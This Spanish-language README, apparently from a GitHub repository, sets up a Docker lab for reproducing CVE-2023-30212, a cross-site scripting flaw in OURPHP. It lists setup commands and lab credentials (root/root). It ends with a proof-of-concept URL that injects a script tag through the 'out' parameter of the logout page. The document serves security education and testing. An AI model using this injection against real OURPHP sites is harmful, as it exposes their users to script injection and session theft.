
Entorno de laboratorio basado en Docker para reproducir CVE-2023-30212, una vulnerabilidad XSS en OURPHP, con instrucciones de configuración paso a paso para pruebas de seguridad y educación.
Prerrequisito
Descargar docker.io
sudo apt install -y docker.io
Descarga todos los archivos de mi repositorio usando el siguiente comando.
git clone https://github.com/AAsh035/CVE-2023-30212.git
Ahora, para crear una imagen de Docker, ejecuta el siguiente comando:
sudo docker build -t vuln .
A continuación, convierte la imagen de Docker en un contenedor. El contenedor debe ejecutarse en el puerto 80. El comando es:
sudo docker run -d -p 80:80 vuln
Para verificar si el contenedor está activo, usa el comando:
sudo docker ps
Escribe 127.0.0.1 en el navegador y se cargará una página de OURPHP.
Necesitas configurar el ourphp con lo siguiente:
Usuario : root
Contraseña : root
Nombre de la base de datos: vuln
Ahora necesitas configurar el usuario y la contraseña para la administración. Establece lo siguiente:
Usuario: root
Contraseña: root
Ahora copia el siguiente enlace y pégalo en el navegador:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0